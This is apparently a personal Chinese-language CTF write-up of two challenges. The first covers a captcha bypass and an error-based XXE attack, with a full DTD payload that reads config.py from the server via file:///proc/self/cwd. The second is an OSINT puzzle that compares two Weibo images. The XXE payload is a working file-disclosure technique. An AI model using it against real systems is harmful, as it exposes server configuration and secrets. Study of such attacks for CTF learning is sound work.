文章目录
t-star writeup
赛题一
一个简单的验证码绕过,在包里,抓一下就可以登陆进后台了
在进入后台后,找到了几个功能点,尝试了sql注入等,一直没成功.
https://www.mi1k7ea.com/2019/06/27/从一道CTF题看如何利用本地DTD文件实现XXE攻击/
后面应该要用XXE漏洞,这里自己知识方面有欠缺,确实没想到这个点
不过在看到有的师傅说用XXE的时候,自己尝试了也没成功,当时是报错了,没有解决…
看wp的时候发现有的师傅通过报错找到了解决方案
参考:https://j7ur8.github.io/WebBook/VUL/%E6%8A%A5%E9%94%99XXE.html
Content-Type: application/xml;charset=UTF-8
http://175.178.148.197:5000/#/login
<!DOCTYPE message [
<!ENTITY % aaa '
<!ENTITY % file SYSTEM "file:///proc/self/cwd/config.py">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///aaa%file;'>">
%eval;
%error;
'>
%aaa;
]>
赛题二
当时在直播间网站里找到了返回主播信息的api,但是那个不对,是chengdu
瞎猜了一个腾讯总部,shenzhen…
看了wp后发现…没那么简单
通过直播间id 及提示微博,找到这个用户
这两张图片…
为啥要放两张呢,肯定有猫腻,两张图应该会不一样(找不同)
所以需要用到图片对比工具
能发现有一处不同…